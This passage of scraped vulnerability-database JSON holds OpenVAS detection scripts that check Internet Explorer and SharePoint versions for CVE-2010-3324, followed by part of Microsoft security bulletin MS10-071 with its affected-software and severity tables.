srvcName)\n {\n dllPath = registry_get_sz(item:\"SharedFilesDir\",\n key:\"SOFTWARE\\Microsoft\\Shared Tools\");\n\n if(!dllPath){\n exit(0);\n }\n\n dllPath = dllPath + \"web server extensions\\12\\BIN\";\n dllVer = fetch_file_version(sysPath:dllPath, file_name:\"Onetutil.dll\");\n\n if(!dllVer){\n exit(0);\n }\n\n ## Check for onetutil.dll version < 12.0.6545.5002 for Sharepoint services 3.0\n if(version_is_less(version:dllVer, test_version:\"12.0.6545.5002\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:05", "description": "This host is installed with Internet Explorer and is prone to\ncross site scripting vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-071.nasl\n(OID:1.3.6.1.4.1.25623.1.0.901162).", "cvss3": {}, "published": "2010-09-23T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3324"], "modified": "2017-02-22T00:00:00", "id": "OPENVAS:902246", "href": "http://plugins.openvas.org/nasl.php?oid=902246", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_ie_static_html_xss_vuln.nasl 5394 2017-02-22 09:22:42Z teissa $\n#\n# Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to bypass the\ncross-site scripting (XSS) protection mechanism and conduct XSS attacks.\n\nImpact Level: Application\";\n\ntag_affected = \"Microsoft Internet Explorer version 8.x to 8.0.6001.18702\";\n\ntag_insight = \"The flaw is due to error in the 'toStaticHTML()' which is not\nproperly handling the 'Cascading Style Sheets (CSS)'.\";\n\ntag_solution = \"Run Windows Update and update the listed hotfixes or download\nand update mentioned hotfixes in the advisory from the below link,\nhttp://www.microsoft.com/technet/security/Bulletin/MS10-071.mspx\";\n\ntag_summary = \"This host is installed with Internet Explorer and is prone to\ncross site scripting vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-071.nasl\n(OID:1.3.6.1.4.1.25623.1.0.901162).\";\n\nif(description)\n{\n script_id(902246);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-23 08:13:58 +0200 (Thu, 23 Sep 2010)\");\n script_cve_id(\"CVE-2010-3324\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_keys(\"MS/IE/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.wooyun.org/bug.php?action=view&id=189\");\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/fulldisclosure/2010-08/0179.html\");\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-071.nasl.\n\ninclude(\"version_func.inc\");\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer){\n exit(0);\n}\n\nif(version_in_range(version:ieVer, test_version:\"8.0\", test_version2:\"8.0.6001.18702\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-06-11T15:22:41", "description": "This host is installed with Internet Explorer and is prone to\n cross site scripting vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.901162.", "cvss3": {}, "published": "2010-09-23T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3324"], "modified": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310902246", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902246", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902246\");\n script_version(\"2020-06-10T11:35:03+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-06-10 11:35:03 +0000 (Wed, 10 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-09-23 08:13:58 +0200 (Thu, 23 Sep 2010)\");\n script_cve_id(\"CVE-2010-3324\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to bypass the\n cross-site scripting (XSS) protection mechanism and conduct XSS attacks.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 8.x to 8.0.6001.18702.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in the 'toStaticHTML()' which is not\n properly handling the 'Cascading Style Sheets (CSS)'.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Internet Explorer and is prone to\n cross site scripting vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.901162.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.wooyun.org/bug.php?action=view&id=189\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2010-08/0179.html\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-071\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-071.nasl.\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:44", "description": "Multiple memory corruptions, cross domain information disclosure.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "securityvulns", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3331", "CVE-2010-0808", "CVE-2010-3330", "CVE-2010-3328", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3243", "CVE-2010-3326", "CVE-2010-3329", "CVE-2010-3327"], "modified": "2010-10-13T00:00:00", "id": "SECURITYVULNS:VULN:11189", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11189", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "Microsoft Security Bulletin MS10-071 - Critical\r\nCumulative Security Update for Internet Explorer (2360131)\r\nPublished: October 12, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves seven privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Important for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, CSS special characters, HTML sanitization, the AutoComplete feature, the Anchor element, and script during certain processes. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by This Update\r\nInternet Explorer 6\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\nInternet Explorer 7\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\nInternet Explorer 8\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\n**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nHow are the Windows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta releases affected by these vulnerabilities? \r\nWindows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta are affected by the vulnerabilities described in this bulletin. Customers running these beta releases are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security update is also available for download from the Microsoft Download Center.\r\n\r\nHow is this security update related to MS10-072? \r\nThe HTML Sanitization Vulnerability (CVE-2010-3243) and HTML Sanitization Vulnerability (CVE-2010-3324) described in this bulletin also affect Microsoft SharePoint. However, you may install only the updates that correspond to the software you have installed on your systems. If you have installed Internet Explorer, apply the required updates according to this bulletin. If you have installed Microsoft SharePoint, apply the required updates according to MS10-072.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI have selected a default browser other than Internet Explorer. Do I still need to apply this update? \r\nInternet Explorer provides application services and functionality for Windows and third-party programs that are maintained through the Cumulative Security Update for Internet Explorer. Microsoft recommends that customers apply the update immediately. The majority of customers have automatic updating enabled and will not need to take any action as this security update will be downloaded and installed automatically.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tAutoComplete Information Disclosure Vulnerability - CVE-2010-0808\tHTML Sanitization Vulnerability - CVE-2010-3243\tHTML Sanitization Vulnerability - CVE-2010-3324\tCSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\tUninitialized Memory Corruption Vulnerability - CVE-2010-3326\tAnchor Element Information Disclosure Vulnerability - CVE-2010-3327\tUninitialized Memory Corruption Vulnerability - CVE-2010-3328\tUninitialized Memory Corruption Vulnerability - CVE-2010-3329\tCross-Domain Information Disclosure Vulnerability - CVE-2010-3330\tUninitialized Memory Corruption Vulnerability - CVE-2010-3331\tAggregate Severity Rating\r\nInternet Explorer 6\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 6 for Windows XP Service Pack 3\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 6 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 6 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 6 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 6 for Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nInternet Explorer 7\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 7 for Windows XP Service Pack 3\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 for Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 in Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2**\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2**\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant 